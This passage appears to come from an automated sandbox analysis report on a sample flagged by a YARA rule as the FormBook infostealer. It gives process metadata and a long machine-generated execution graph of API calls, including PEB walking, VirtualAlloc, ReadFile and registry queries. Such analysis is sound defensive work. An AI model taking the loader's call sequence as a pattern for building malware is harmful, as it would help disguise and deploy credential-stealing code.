                                                                        Commandline:"C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe"
                                                                        Imagebase:0xa50000
                                                                        File size:140'800 bytes
                                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3131106553.0000000004C10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:14
                                                                        Start time:13:55:25
                                                                        Start date:07/11/2024
                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                        Imagebase:0x7ff722870000
                                                                        File size:676'768 bytes
                                                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:3.2%
                                                                          Dynamic/Decrypted Code Coverage:2.2%
                                                                          Signature Coverage:4.4%
                                                                          Total number of Nodes:1856
                                                                          Total number of Limit Nodes:36
                                                                          execution_graph 86103 4010e0 86106 401100 86103->86106 86105 4010f8 86107 401113 86106->86107 86108 401182 86107->86108 86110 401120 86107->86110 86111 401184 86107->86111 86112 40114c 86107->86112 86109 40112c DefWindowProcW 86108->86109 86109->86105 86110->86109 86151 401000 Shell_NotifyIconW setSBCS 86110->86151 86144 401250 61 API calls setSBCS 86111->86144 86114 401151 86112->86114 86115 40119d 86112->86115 86116 401219 86114->86116 86117 40115d 86114->86117 86119 4011a3 86115->86119 86120 42afb4 86115->86120 86116->86110 86123 401225 86116->86123 86121 401163 86117->86121 86122 42b01d 86117->86122 86118 401193 86118->86105 86119->86110 86129 4011b6 KillTimer 86119->86129 86130 4011db SetTimer RegisterWindowMessageW 86119->86130 86146 40f190 10 API calls 86120->86146 86126 42afe9 86121->86126 86127 40116c 86121->86127 86122->86109 86150 4370f4 52 API calls 86122->86150 86153 468b0e 74 API calls setSBCS 86123->86153 86148 40f190 10 API calls 86126->86148 86127->86110 86133 401174 86127->86133 86128 42b04f 86152 40e0c0 74 API calls setSBCS 86128->86152 86145 401000 Shell_NotifyIconW setSBCS 86129->86145 86130->86118 86131 401204 CreatePopupMenu 86130->86131 86131->86105 86147 45fd57 65 API calls setSBCS 86133->86147 86138 42afe4 86138->86118 86139 42b00e 86149 401a50 331 API calls 86139->86149 86140 4011c9 PostQuitMessage 86140->86105 86143 42afdc 86143->86109 86143->86138 86144->86118 86145->86140 86146->86118 86147->86143 86148->86139 86149->86108 86150->86108 86151->86128 86152->86108 86153->86138 86154 40bd20 86155 428194 86154->86155 86156 40bd2d 86154->86156 86158 40bd43 86155->86158 86160 4281bc 86155->86160 86162 4281b2 86155->86162 86157 40bd37 86156->86157 86177 4531b1 85 API calls 5 library calls 86156->86177 86166 40bd50 86157->86166 86176 45e987 86 API calls moneypunct 86160->86176 86175 40b510 VariantClear 86162->86175 86165 4281ba 86167 426cf1 86166->86167 86168 40bd63 86166->86168 86187 44cde9 52 API calls _memmove 86167->86187 86178 40bd80 86168->86178 86171 40bd73 86171->86158 86172 426cfc 86188 40e0a0 86172->86188 86174 426d02 86175->86165 86176->86156 86177->86157 86179 40bd8e 86178->86179 86186 40bdb7 _memmove 86178->86186 86180 40bded 86179->86180 86181 40bdad 86179->86181 86179->86186 86198 4115d7 86180->86198 86192 402f00 86181->86192 86185 4115d7 52 API calls 86185->86186 86186->86171 86187->86172 86189 40e0b2 86188->86189 86190 40e0a8 86188->86190 86189->86174 86232 403c30 52 API calls _memmove 86190->86232 86193 402f10 86192->86193 86194 402f0c 86192->86194 86195 4115d7 52 API calls 86193->86195 86196 4268c3 86193->86196 86194->86186 86197 402f51 moneypunct _memmove 86195->86197 86197->86186 86200 4115e1 _malloc 86198->86200 86201 40bdf6 86200->86201 86204 4115fd std::exception::exception 86200->86204 86209 4135bb 86200->86209 86201->86185 86201->86186 86202 41163b 86224 4180af 46 API calls std::exception::operator= 86202->86224 86204->86202 86223 41130a 51 API calls __cinit 86204->86223 86205 411645 86225 418105 RaiseException 86205->86225 86208 411656 86210 413638 _malloc 86209->86210 86219 4135c9 _malloc 86209->86219 86231 417f77 46 API calls __getptd_noexit 86210->86231 86213 4135f7 RtlAllocateHeap 86214 413630 86213->86214 86213->86219 86214->86200 86216 413624 86229 417f77 46 API calls __getptd_noexit 86216->86229 86219->86213 86219->86216 86220 413622 86219->86220 86221 4135d4 86219->86221 86230 417f77 46 API calls __getptd_noexit 86220->86230 86221->86219 86226 418901 46 API calls 2 library calls 86221->86226 86227 418752 46 API calls 9 library calls 86221->86227 86228 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86221->86228 86223->86202 86224->86205 86225->86208 86226->86221 86227->86221 86229->86220 86230->86214 86231->86214 86232->86189 86233 40329a3 86234 40329a8 86233->86234 86242 4030048 86234->86242 86236 40329b4 86237 40329d2 86236->86237 86238 4032a68 86236->86238 86245 4032678 86237->86245 86258 4033318 9 API calls 86238->86258 86241 4032a4f 86259 4033528 GetPEB 86242->86259 86244 40306d3 86244->86236 86246 4030048 GetPEB 86245->86246 86247 4032717 86246->86247 86250 4032771 VirtualAlloc 86247->86250 86252 4032755 86247->86252 86256 4032878 CloseHandle 86247->86256 86257 4032888 VirtualFree 86247->86257 86261 4033588 GetPEB 86247->86261 86249 4032748 CreateFileW 86249->86247 86249->86252 86251 4032792 ReadFile 86250->86251 86250->86252 86251->86252 86253 40327b0 VirtualAlloc 86251->86253 86254 4032972 86252->86254 86255 4032964 VirtualFree 86252->86255 86253->86247 86253->86252 86254->86241 86255->86254 86256->86247 86257->86247 86258->86241 86260 4033552 86259->86260 86260->86244 86262 40335b2 86261->86262 86262->86249 86263 425ba2 86268 40e360 86263->86268 86265 425bb4 86284 41130a 51 API calls __cinit 86265->86284 86267 425bbe 86269 4115d7 52 API calls 86268->86269 86270 40e3ec GetModuleFileNameW 86269->86270 86285 413a0e 86270->86285 86272 40e421 _wcsncat 86288 413a9e 86272->86288 86275 4115d7 52 API calls 86276 40e45e _wcscpy 86275->86276 86291 40bc70 86276->86291 86280 40e4a1 _wcscat _wcslen _wcsncpy 86281 40e4a9 86280->86281 86282 401c90 52 API calls 86280->86282 86283 4115d7 52 API calls 86280->86283 86281->86265 86282->86280 86283->86280 86284->86267 86310 413801 86285->86310 86340 419efd 86288->86340 86292 4115d7 52 API calls 86291->86292 86293 40bc98 86292->86293 86294 4115d7 52 API calls 86293->86294 86295 40bca6 86294->86295 86296 40e4c0 86295->86296 86352 403350 86296->86352 86298 40e4cb RegOpenKeyExW 86299 427190 RegQueryValueExW 86298->86299 86300 40e4eb 86298->86300 86301 4271b0 86299->86301 86302 42721a RegCloseKey 86299->86302 86300->86280 86303 4115d7 52 API calls 86301->86303 86302->86280 86304 4271cb 86303->86304 86359 43652f 52 API calls 86304->86359 86306 4271d8 RegQueryValueExW 86307 42720e 86306->86307 86308 4271f7 86306->86308 86307->86302 86360 402160 86308->86360 86311 41389e 86310->86311 86317 41381a 86310->86317 86312 4139e8 86311->86312 86314 413a00 86311->86314 86337 417f77 46 API calls __getptd_noexit 86312->86337 86339 417f77 46 API calls __getptd_noexit 86314->86339 86315 4139ed 86338 417f25 10 API calls __wfsopen 86315->86338 86317->86311 86325 41388a 86317->86325 86332 419e30 46 API calls __wfsopen 86317->86332 86320 41396c 86320->86311 86322 413967 86320->86322 86323 41397a 86320->86323 86321 413929 86321->86311 86324 413945 86321->86324 86334 419e30 46 API calls __wfsopen 86321->86334 86322->86272 86336 419e30 46 API calls __wfsopen 86323->86336 86324->86311 86324->86322 86328 41395b 86324->86328 86325->86311 86331 413909 86325->86331 86333 419e30 46 API calls __wfsopen 86325->86333 86335 419e30 46 API calls __wfsopen 86328->86335 86331->86320 86331->86321 86332->86325 86333->86331 86334->86324 86335->86322 86336->86322 86337->86315 86338->86322 86339->86322 86341 419f13 86340->86341 86342 419f0e 86340->86342 86349 417f77 46 API calls __getptd_noexit 86341->86349 86342->86341 86346 419f2b 86342->86346 86344 419f18 86350 417f25 10 API calls __wfsopen 86344->86350 86347 40e454 86346->86347 86351 417f77 46 API calls __getptd_noexit 86346->86351 86347->86275 86349->86344 86350->86347 86351->86344 86353 403367 86352->86353 86354 403358 86352->86354 86355 4115d7 52 API calls 86353->86355 86354->86298 86356 403370 86355->86356 86357 4115d7 52 API calls 86356->86357 86358 40339e 86357->86358 86358->86298 86359->86306 86361 426daa 86360->86361 86362 40216b _wcslen 86360->86362 86375 40c600 86361->86375 86365 402180 86362->86365 86366 40219e 86362->86366 86364 426db5 86364->86307 86373 403bd0 52 API calls moneypunct 86365->86373 86374 4013a0 52 API calls 86366->86374 86369 402187 _memmove 86369->86307 86370 4021a5 86371 426db7 86370->86371 86372 4115d7 52 API calls 86370->86372 86372->86369 86373->86369 86374->86370 86376 40c619 86375->86376 86377 40c60a 86375->86377 86376->86364 86377->86376 86380 4026f0 86377->86380 86379 426d7a _memmove 86379->86364 86381 426873 86380->86381 86382 4026ff 86380->86382 86387 4013a0 52 API calls 86381->86387 86382->86379 86384 42687b 86385 4115d7 52 API calls 86384->86385 86386 42689e _memmove 86385->86386 86386->86379 86387->86384 86388 416454 86425 416c70 86388->86425 86390 416460 GetStartupInfoW 86391 416474 86390->86391 86426 419d5a HeapCreate 86391->86426 86393 4164cd 86394 4164d8 86393->86394 86510 41642b 46 API calls 3 library calls 86393->86510 86427 417c20 GetModuleHandleW 86394->86427 86397 4164de 86398 4164e9 __RTC_Initialize 86397->86398 86511 41642b 46 API calls 3 library calls 86397->86511 86446 41aaa1 GetStartupInfoW 86398->86446 86402 416503 GetCommandLineW 86459 41f584 GetEnvironmentStringsW 86402->86459 86406 416513 86465 41f4d6 GetModuleFileNameW 86406->86465 86408 41651d 86409 416528 86408->86409 86513 411924 46 API calls 3 library calls 86408->86513 86469 41f2a4 86409->86469 86412 41652e 86413 416539 86412->86413 86514 411924 46 API calls 3 library calls 86412->86514 86483 411703 86413->86483 86416 416541 86418 41654c __wwincmdln 86416->86418 86515 411924 46 API calls 3 library calls 86416->86515 86487 40d6b0 86418->86487 86421 41657c 86517 411906 46 API calls _doexit 86421->86517 86424 416581 __wfsopen 86425->86390 86426->86393 86428 417c34 86427->86428 86429 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86427->86429 86518 4178ff 49 API calls _free 86428->86518 86431 417c87 TlsAlloc 86429->86431 86434 417cd5 TlsSetValue 86431->86434 86435 417d96 86431->86435 86432 417c39 86432->86397 86434->86435 86436 417ce6 __init_pointers 86434->86436 86435->86397 86519 418151 InitializeCriticalSectionAndSpinCount 86436->86519 86438 417d91 86527 4178ff 49 API calls _free 86438->86527 86440 417d2a 86440->86438 86520 416b49 86440->86520 86443 417d76 86526 41793c 46 API calls 4 library calls 86443->86526 86445 417d7e GetCurrentThreadId 86445->86435 86447 416b49 __calloc_crt 46 API calls 86446->86447 86448 41aabf 86447->86448 86448->86448 86449 41ac34 86448->86449 86452 416b49 __calloc_crt 46 API calls 86448->86452 86453 4164f7 86448->86453 86455 41abb4 86448->86455 86450 41ac6a GetStdHandle 86449->86450 86451 41acce SetHandleCount 86449->86451 86454 41ac7c GetFileType 86449->86454 86458 41aca2 InitializeCriticalSectionAndSpinCount 86449->86458 86450->86449 86451->86453 86452->86448 86453->86402 86512 411924 46 API calls 3 library calls 86453->86512 86454->86449 86455->86449 86456 41abe0 GetFileType 86455->86456 86457 41abeb InitializeCriticalSectionAndSpinCount 86455->86457 86456->86455 86456->86457 86457->86453 86457->86455 86458->86449 86458->86453 86460 41f595 86459->86460 86461 41f599 86459->86461 86460->86406 86537 416b04 86461->86537 86463 41f5bb _memmove 86464 41f5c2 FreeEnvironmentStringsW 86463->86464 86464->86406 86466 41f50b _wparse_cmdline 86465->86466 86467 416b04 __malloc_crt 46 API calls 86466->86467 86468 41f54e _wparse_cmdline 86466->86468 86467->86468 86468->86408 86470 41f2bc _wcslen 86469->86470 86474 41f2b4 86469->86474 86471 416b49 __calloc_crt 46 API calls 86470->86471 86476 41f2e0 _wcslen 86471->86476 86472 41f336 86544 413748 86472->86544 86474->86412 86475 416b49 __calloc_crt 46 API calls 86475->86476 86476->86472 86476->86474 86476->86475 86477 41f35c 86476->86477 86480 41f373 86476->86480 86543 41ef12 46 API calls __wfsopen 86476->86543 86478 413748 _free 46 API calls 86477->86478 86478->86474 86550 417ed3 86480->86550 86482 41f37f 86482->86412 86484 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86483->86484 86486 411750 __IsNonwritableInCurrentImage 86484->86486 86569 41130a 51 API calls __cinit 86484->86569 86486->86416 86488 42e2f3 86487->86488 86489 40d6cc 86487->86489 86570 408f40 86489->86570 86491 40d707 86574 40ebb0 86491->86574 86496 40d737 86577 411951 86496->86577 86499 40d751 86589 40f4e0 SystemParametersInfoW SystemParametersInfoW 86499->86589 86501 40d75f 86590 40d590 GetCurrentDirectoryW 86501->86590 86503 40d767 SystemParametersInfoW 86504 40d794 86503->86504 86505 40d78d FreeLibrary 86503->86505 86506 408f40 VariantClear 86504->86506 86505->86504 86507 40d79d 86506->86507 86508 408f40 VariantClear 86507->86508 86509 40d7a6 86508->86509 86509->86421 86516 4118da 46 API calls _doexit 86509->86516 86510->86394 86511->86398 86516->86421 86517->86424 86518->86432 86519->86440 86522 416b52 86520->86522 86523 416b8f 86522->86523 86524 416b70 Sleep 86522->86524 86528 41f677 86522->86528 86523->86438 86523->86443 86525 416b85 86524->86525 86525->86522 86525->86523 86526->86445 86527->86435 86529 41f683 86528->86529 86530 41f69e _malloc 86528->86530 86529->86530 86531 41f68f 86529->86531 86533 41f6b1 HeapAlloc 86530->86533 86535 41f6d8 86530->86535 86536 417f77 46 API calls __getptd_noexit 86531->86536 86533->86530 86533->86535 86534 41f694 86534->86522 86535->86522 86536->86534 86540 416b0d 86537->86540 86538 4135bb _malloc 45 API calls 86538->86540 86539 416b43 86539->86463 86540->86538 86540->86539 86541 416b24 Sleep 86540->86541 86542 416b39 86541->86542 86542->86539 86542->86540 86543->86476 86545 41377c __dosmaperr 86544->86545 86546 413753 RtlFreeHeap 86544->86546 86545->86474 86546->86545 86547 413768 86546->86547 86553 417f77 46 API calls __getptd_noexit 86547->86553 86549 41376e GetLastError 86549->86545 86554 417daa 86550->86554 86553->86549 86555 417dc9 setSBCS __call_reportfault 86554->86555 86556 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86555->86556 86559 417eb5 __call_reportfault 86556->86559 86558 417ed1 GetCurrentProcess TerminateProcess 86558->86482 86560 41a208 86559->86560 86561 41a210 86560->86561 86562 41a212 IsDebuggerPresent 86560->86562 86561->86558 86568 41fe19 86562->86568 86565 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86566 421ff0 __call_reportfault 86565->86566 86567 421ff8 GetCurrentProcess TerminateProcess 86565->86567 86566->86567 86567->86558 86568->86565 86569->86486 86573 408f48 moneypunct 86570->86573 86571 4265c7 VariantClear 86572 408f55 moneypunct 86571->86572 86572->86491 86573->86571 86573->86572 86630 40ebd0 86574->86630 86634 4182cb 86577->86634 86579 41195e 86641 4181f2 LeaveCriticalSection 86579->86641 86581 40d748 86582 4119b0 86581->86582 86583 4119d6 86582->86583 86584 4119bc 86582->86584 86583->86499 86584->86583 86676 417f77 46 API calls __getptd_noexit 86584->86676 86586 4119c6 86677 417f25 10 API calls __wfsopen 86586->86677 86588 4119d1 86588->86499 86589->86501 86678 401f20 86590->86678 86592 40d5b6 IsDebuggerPresent 86593 40d5c4 86592->86593 86594 42e1bb MessageBoxA 86592->86594 86595 42e1d4 86593->86595 86596 40d5e3 86593->86596 86594->86595 86851 403a50 52 API calls 3 library calls 86595->86851 86748 40f520 86596->86748 86600 40d5fd GetFullPathNameW 86760 401460 86600->86760 86602 40d63b 86603 40d643 86602->86603 86604 42e231 SetCurrentDirectoryW 86602->86604 86605 40d64c 86603->86605 86852 432fee 6 API calls 86603->86852 86604->86603 86775 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86605->86775 86608 42e252 86608->86605 86610 42e25a GetModuleFileNameW 86608->86610 86612 42e274 86610->86612 86613 42e2cb GetForegroundWindow ShellExecuteW 86610->86613 86853 401b10 86612->86853 86616 40d688 86613->86616 86614 40d656 86615 40d669 86614->86615 86849 40e0c0 74 API calls setSBCS 86614->86849 86783 4091e0 86615->86783 86622 40d692 SetCurrentDirectoryW 86616->86622 86622->86503 86624 42e28d 86860 40d200 52 API calls 2 library calls 86624->86860 86627 42e299 GetForegroundWindow ShellExecuteW 86628 42e2c6 86627->86628 86628->86616 86629 40ec00 LoadLibraryA GetProcAddress 86629->86496 86631 40d72e 86630->86631 86632 40ebd6 LoadLibraryA 86630->86632 86631->86496 86631->86629 86632->86631 86633 40ebe7 GetProcAddress 86632->86633 86633->86631 86635 4182e0 86634->86635 86636 4182f3 EnterCriticalSection 86634->86636 86642 418209 86635->86642 86636->86579 86638 4182e6 86638->86636 86669 411924 46 API calls 3 library calls 86638->86669 86641->86581 86643 418215 __wfsopen 86642->86643 86644 418225 86643->86644 86645 41823d 86643->86645 86670 418901 46 API calls 2 library calls 86644->86670 86647 416b04 __malloc_crt 45 API calls 86645->86647 86654 41824b __wfsopen 86645->86654 86649 418256 86647->86649 86648 41822a 86671 418752 46 API calls 9 library calls 86648->86671 86652 41825d 86649->86652 86653 41826c 86649->86653 86651 418231 86672 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86651->86672 86673 417f77 46 API calls __getptd_noexit 86652->86673 86657 4182cb __lock 45 API calls 86653->86657 86654->86638 86659 418273 86657->86659 86660 4182a6 86659->86660 86661 41827b InitializeCriticalSectionAndSpinCount 86659->86661 86662 413748 _free 45 API calls 86660->86662 86663 418297 86661->86663 86664 41828b 86661->86664 86662->86663 86675 4182c2 LeaveCriticalSection _doexit 86663->86675 86665 413748 _free 45 API calls 86664->86665 86666 418291 86665->86666 86674 417f77 46 API calls __getptd_noexit 86666->86674 86670->86648 86671->86651 86673->86654 86674->86663 86675->86654 86676->86586 86677->86588 86861 40e6e0 86678->86861 86682 401f41 GetModuleFileNameW 86879 410100 86682->86879 86684 401f5c 86891 410960 86684->86891 86687 401b10 52 API calls 86688 401f81 86687->86688 86894 401980 86688->86894 86690 401f8e 86691 408f40 VariantClear 86690->86691 86692 401f9d 86691->86692 86693 401b10 52 API calls 86692->86693 86694 401fb4 86693->86694 86695 401980 53 API calls 86694->86695 86696 401fc3 86695->86696 86697 401b10 52 API calls 86696->86697 86698 401fd2 86697->86698 86902 40c2c0 86698->86902 86700 401fe1 86701 40bc70 52 API calls 86700->86701 86702 401ff3 86701->86702 86920 401a10 86702->86920 86704 401ffe 86927 4114ab 86704->86927 86707 428b05 86709 401a10 52 API calls 86707->86709 86708 402017 86710 4114ab __wcsicoll 58 API calls 86708->86710 86711 428b18 86709->86711 86712 402022 86710->86712 86714 401a10 52 API calls 86711->86714 86712->86711 86713 40202d 86712->86713 86715 4114ab __wcsicoll 58 API calls 86713->86715 86716 428b33 86714->86716 86717 402038 86715->86717 86719 428b3b GetModuleFileNameW 86716->86719 86718 402043 86717->86718 86717->86719 86720 4114ab __wcsicoll 58 API calls 86718->86720 86721 401a10 52 API calls 86719->86721 86722 40204e 86720->86722 86723 428b6c 86721->86723 86724 402092 86722->86724 86728 401a10 52 API calls 86722->86728 86733 428b90 _wcscpy 86722->86733 86725 40e0a0 52 API calls 86723->86725 86727 4020a3 86724->86727 86724->86733 86726 428b7a 86725->86726 86729 401a10 52 API calls 86726->86729 86730 428bc6 86727->86730 86935 40e830 53 API calls 86727->86935 86731 402073 _wcscpy 86728->86731 86732 428b88 86729->86732 86739 401a10 52 API calls 86731->86739 86732->86733 86735 401a10 52 API calls 86733->86735 86741 4020d0 86735->86741 86736 4020bb 86936 40cf00 53 API calls 86736->86936 86738 4020c6 86740 408f40 VariantClear 86738->86740 86739->86724 86740->86741 86743 402110 86741->86743 86746 401a10 52 API calls 86741->86746 86937 40cf00 53 API calls 86741->86937 86938 40e6a0 53 API calls 86741->86938 86745 408f40 VariantClear 86743->86745 86747 402120 moneypunct 86745->86747 86746->86741 86747->86592 86749 4295c9 setSBCS 86748->86749 86750 40f53c 86748->86750 86752 4295d9 GetOpenFileNameW 86749->86752 87617 410120 86750->87617 86752->86750 86755 40d5f5 86752->86755 86753 40f545 87621 4102b0 SHGetMalloc 86753->87621 86755->86600 86755->86602 86756 40f54c 87626 410190 GetFullPathNameW 86756->87626 86758 40f559 87637 40f570 86758->87637 87699 402400 86760->87699 86762 40146f 86764 428c29 _wcscat 86762->86764 87708 401500 86762->87708 86765 40147c 86765->86764 87716 40d440 86765->87716 86767 401489 86767->86764 86768 401491 GetFullPathNameW 86767->86768 86769 402160 52 API calls 86768->86769 86770 4014bb 86769->86770 86771 402160 52 API calls 86770->86771 86772 4014c8 86771->86772 86772->86764 86773 402160 52 API calls 86772->86773 86774 4014ee 86773->86774 86774->86602 86776 428361 86775->86776 86777 4103fc LoadImageW RegisterClassExW 86775->86777 87736 44395e EnumResourceNamesW LoadImageW 86776->87736 87735 410490 7 API calls 86777->87735 86780 40d651 86782 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86780->86782 86781 428368 86782->86614 86784 409202 86783->86784 86785 42d7ad 86783->86785 86841 409216 moneypunct 86784->86841 87873 410940 331 API calls 86784->87873 87876 45e737 90 API calls 3 library calls 86785->87876 86788 409386 86789 40939c 86788->86789 87874 40f190 10 API calls 86788->87874 86789->86616 86850 401000 Shell_NotifyIconW setSBCS 86789->86850 86791 4095b2 86791->86789 86793 4095bf 86791->86793 86792 409253 PeekMessageW 86792->86841 87875 401a50 331 API calls 86793->87875 86795 40d410 VariantClear 86795->86841 86796 42d8cd Sleep 86796->86841 86797 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86797->86789 86800 4095f9 86797->86800 86799 42e13b 87894 40d410 VariantClear 86799->87894 86802 42e158 TranslateMessage DispatchMessageW GetMessageW 86800->86802 86802->86802 86805 42e188 86802->86805 86804 409567 PeekMessageW 86804->86841 86805->86789 86808 44c29d 52 API calls 86847 4094e0 86808->86847 86809 46fdbf 108 API calls 86809->86847 86810 46f3c1 107 API calls 86810->86841 86811 40e0a0 52 API calls 86811->86841 86812 409551 TranslateMessage DispatchMessageW 86812->86804 86814 42dcd2 WaitForSingleObject 86817 42dcf0 GetExitCodeProcess CloseHandle 86814->86817 86814->86841 86815 42dd3d Sleep 86815->86847 86816 47d33e 309 API calls 86816->86841 87883 40d410 VariantClear 86817->87883 86821 4094cf Sleep 86821->86847 86824 42d94d timeGetTime 87879 465124 53 API calls 86824->87879 86826 40c620 timeGetTime 86826->86847 86828 465124 53 API calls 86828->86847 86829 42dd89 CloseHandle 86829->86847 86831 42de19 GetExitCodeProcess CloseHandle 86831->86847 86832 401b10 52 API calls 86832->86847 86835 42de88 Sleep 86835->86841 86838 45e737 90 API calls 86838->86841 86841->86788 86841->86792 86841->86795 86841->86796 86841->86799 86841->86804 86841->86810 86841->86811 86841->86812 86841->86814 86841->86815 86841->86816 86841->86821 86841->86824 86841->86838 86842 42e0cc VariantClear 86841->86842 86843 408f40 VariantClear 86841->86843 86841->86847 87737 4091b0 86841->87737 87795 40afa0 86841->87795 87821 408fc0 86841->87821 87856 408cc0 86841->87856 87870 4096a0 331 API calls 4 library calls 86841->87870 87871 40d150 TranslateAcceleratorW 86841->87871 87872 40d170 IsDialogMessageW GetClassLongW 86841->87872 87877 465124 53 API calls 86841->87877 87878 40c620 timeGetTime 86841->87878 87893 40e270 VariantClear moneypunct 86841->87893 86842->86841 86843->86841 86845 401980 53 API calls 86845->86847 86847->86808 86847->86809 86847->86826 86847->86828 86847->86829 86847->86831 86847->86832 86847->86835 86847->86841 86847->86845 86848 408f40 VariantClear 86847->86848 87880 45178a 54 API calls 86847->87880 87881 47d33e 331 API calls 86847->87881 87882 453bc6 54 API calls 86847->87882 87884 40d410 VariantClear 86847->87884 87885 443d19 67 API calls _wcslen 86847->87885 87886 4574b4 VariantClear 86847->87886 87887 403cd0 86847->87887 87891 4731e1 VariantClear 86847->87891 87892 4331a2 6 API calls 86847->87892 86848->86847 86849->86615 86850->86616 86851->86602 86852->86608 86854 401b16 _wcslen 86853->86854 86855 401b63 86854->86855 86856 4115d7 52 API calls 86854->86856 86859 40d200 52 API calls 2 library calls 86855->86859 86857 401b4b _memmove 86856->86857 86858 4115d7 52 API calls 86857->86858 86858->86855 86859->86624 86860->86627 86862 40bc70 52 API calls 86861->86862 86863 401f31 86862->86863 86864 402560 86863->86864 86865 40256d __write_nolock 86864->86865 86866 402160 52 API calls 86865->86866 86868 402593 86866->86868 86878 4025bd 86868->86878 86939 401c90 86868->86939 86869 4026f0 52 API calls 86869->86878 86870 4026a7 86871 401b10 52 API calls 86870->86871 86877 4026db 86870->86877 86872 4026d1 86871->86872 86943 40d7c0 52 API calls 2 library calls 86872->86943 86873 401b10 52 API calls 86873->86878 86875 401c90 52 API calls 86875->86878 86877->86682 86878->86869 86878->86870 86878->86873 86878->86875 86942 40d7c0 52 API calls 2 library calls 86878->86942 86944 40f760 86879->86944 86882 410118 86882->86684 86884 42805d 86885 42806a 86884->86885 87000 431e58 86884->87000 86886 413748 _free 46 API calls 86885->86886 86888 428078 86886->86888 86889 431e58 82 API calls 86888->86889 86890 428084 86889->86890 86890->86684 86892 4115d7 52 API calls 86891->86892 86893 401f74 86892->86893 86893->86687 86895 4019a3 86894->86895 86896 401985 86894->86896 86895->86896 86897 4019b8 86895->86897 86898 40199f 86896->86898 87605 403e10 53 API calls 86896->87605 87606 403e10 53 API calls 86897->87606 86898->86690 86900 4019c4 86900->86690 86903 40c2c7 86902->86903 86904 40c30e 86902->86904 86907 40c2d3 86903->86907 86908 426c79 86903->86908 86905 40c315 86904->86905 86906 426c2b 86904->86906 86909 40c321 86905->86909 86910 426c5a 86905->86910 86912 426c4b 86906->86912 86913 426c2e 86906->86913 87607 403ea0 52 API calls __cinit 86907->87607 87612 4534e3 52 API calls 86908->87612 87608 403ea0 52 API calls __cinit 86909->87608 87611 4534e3 52 API calls 86910->87611 87610 4534e3 52 API calls 86912->87610 86919 40c2de 86913->86919 87609 4534e3 52 API calls 86913->87609 86919->86700 86919->86919 86921 401a30 86920->86921 86922 401a17 86920->86922 86924 402160 52 API calls 86921->86924 86923 401a2d 86922->86923 87613 403c30 52 API calls _memmove 86922->87613 86923->86704 86926 401a3d 86924->86926 86926->86704 86928 411523 86927->86928 86929 4114ba 86927->86929 87616 4113a8 58 API calls 3 library calls 86928->87616 86933 40200c 86929->86933 87614 417f77 46 API calls __getptd_noexit 86929->87614 86932 4114c6 87615 417f25 10 API calls __wfsopen 86932->87615 86933->86707 86933->86708 86935->86736 86936->86738 86937->86741 86938->86741 86940 4026f0 52 API calls 86939->86940 86941 401c97 86940->86941 86941->86868 86942->86878 86943->86877 87004 40f6f0 86944->87004 86946 40f77b _strcat moneypunct 87012 40f850 86946->87012 86951 427c2a 87041 414d04 86951->87041 86953 40f7fc 86953->86951 86954 40f804 86953->86954 87028 414a46 86954->87028 86958 40f80e 86958->86882 86963 4528bd 86958->86963 86960 427c59 87047 414fe2 86960->87047 86962 427c79 86964 4150d1 _fseek 81 API calls 86963->86964 86965 452930 86964->86965 87547 452719 86965->87547 86968 452948 86968->86884 86969 414d04 __fread_nolock 61 API calls 86970 452966 86969->86970 86971 414d04 __fread_nolock 61 API calls 86970->86971 86972 452976 86971->86972 86973 414d04 __fread_nolock 61 API calls 86972->86973 86974 45298f 86973->86974 86975 414d04 __fread_nolock 61 API calls 86974->86975 86976 4529aa 86975->86976 86977 4150d1 _fseek 81 API calls 86976->86977 86978 4529c4 86977->86978 86979 4135bb _malloc 46 API calls 86978->86979 86980 4529cf 86979->86980 86981 4135bb _malloc 46 API calls 86980->86981 86982 4529db 86981->86982 86983 414d04 __fread_nolock 61 API calls 86982->86983 86984 4529ec 86983->86984 86985 44afef GetSystemTimeAsFileTime 86984->86985 86986 452a00 86985->86986 86987 452a36 86986->86987 86988 452a13 86986->86988 86990 452aa5 86987->86990 86991 452a3c 86987->86991 86989 413748 _free 46 API calls 86988->86989 86993 452a1c 86989->86993 86992 413748 _free 46 API calls 86990->86992 87553 44b1a9 86991->87553 86995 452aa3 86992->86995 86996 413748 _free 46 API calls 86993->86996 86995->86884 86998 452a25 86996->86998 86997 452a9d 86999 413748 _free 46 API calls 86997->86999 86998->86884 86999->86995 87001 431e64 87000->87001 87002 431e6a 87000->87002 87003 414a46 __fcloseall 82 API calls 87001->87003 87002->86885 87003->87002 87005 425de2 87004->87005 87006 40f6fc _wcslen 87004->87006 87005->86946 87007 40f710 WideCharToMultiByte 87006->87007 87008 40f756 87007->87008 87009 40f728 87007->87009 87008->86946 87010 4115d7 52 API calls 87009->87010 87011 40f735 WideCharToMultiByte 87010->87011 87011->86946 87014 40f85d setSBCS _strlen 87012->87014 87015 40f7ab 87014->87015 87060 414db8 87014->87060 87016 4149c2 87015->87016 87075 414904 87016->87075 87018 40f7e9 87018->86951 87019 40f5c0 87018->87019 87023 40f5cd _strcat 